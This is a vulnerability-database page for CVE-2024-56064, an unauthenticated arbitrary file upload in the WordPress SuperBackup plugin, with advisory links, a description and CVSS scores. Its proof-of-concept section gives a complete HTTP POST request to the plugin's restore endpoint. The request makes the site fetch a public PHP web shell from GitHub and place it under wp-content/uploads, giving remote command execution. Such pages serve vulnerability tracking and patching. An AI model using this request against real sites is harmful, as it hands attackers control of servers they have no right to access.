Vulners
Lucene search
WordPress SuperBackup 2.3.3 Shell Upload
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | WordPress SuperBackup 2.3.3 Shell Upload Vulnerability | 15 Jan 202500:00 | – | zdt |
 | CVE-2024-56064 | 31 Dec 202413:12 | – | circl |
 | WordPress plugin WP SuperBackup 代码问题漏洞 | 31 Dec 202400:00 | – | cnnvd |
 | CVE-2024-56064 | 31 Dec 202412:54 | – | cve |
 | CVE-2024-56064 WordPress WP SuperBackup plugin <= 2.3.3 - Unauthenticated Arbitrary File Upload vulnerability | 31 Dec 202412:54 | – | cvelist |
 | CVE-2024-56064 | 31 Dec 202413:15 | – | nvd |
 | WordPress WP SuperBackup plugin <= 2.3.3 - Unauthenticated Arbitrary File Upload vulnerability | 18 Dec 202414:06 | – | patchstack |
 | CVE-2024-56064 | 31 Dec 202413:15 | – | prion |
 | CVE-2024-56064 | 5 Feb 202509:19 | – | redhatcve |
 | VulnCheck KEV: CVE-2024-56064 | 30 Sep 202500:00 | – | vulncheck_kev |
10
# CVE-2024-56064
WP SuperBackup <= 2.3.3 - Unauthenticated Arbitrary File Upload
# Description
The Super Backup & Clone - Migrate for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 2.3.3. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
## Details
- **Type**: plugin
- **Slug**: indeed-wp-superbackup
- **Affected Version**: 2.3.3
- **CVSS Score**: 9.8
- **CVSS Rating**: Critical
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **CVE**: CVE-2024-56064
- **Status**: Private
POC
---
Takes a while for the shell to appear.... it will appear in `/wp-content/uploads/isnapshots/shell.php`
```
POST /wp-admin/admin.php?page=ibk_admin&tab=restore HTTP/1.1
Host: kubernetes.docker.internal:8929
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal:8929/wp-admin/admin.php?page=ibk_admin&tab=restore
Content-Type: multipart/form-data; boundary=---------------------------24461452295617717774000608677
Content-Length: 688
Origin: http://kubernetes.docker.internal:8929
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i
-----------------------------24461452295617717774000608677
Content-Disposition: form-data; name="ibk_restore_migrate_action"
1
-----------------------------24461452295617717774000608677
Content-Disposition: form-data; name="restore_type"
restore_url
-----------------------------24461452295617717774000608677
Content-Disposition: form-data; name="restore_url"
https://raw.githubusercontent.com/flozz/p0wny-shell/refs/heads/master/shell.php
-----------------------------24461452295617717774000608677
Content-Disposition: form-data; name="upload_file"; filename=""
Content-Type: application/octet-stream
-----------------------------24461452295617717774000608677--
```Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Jan 2025 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 3.110
EPSS0.58464
SSVC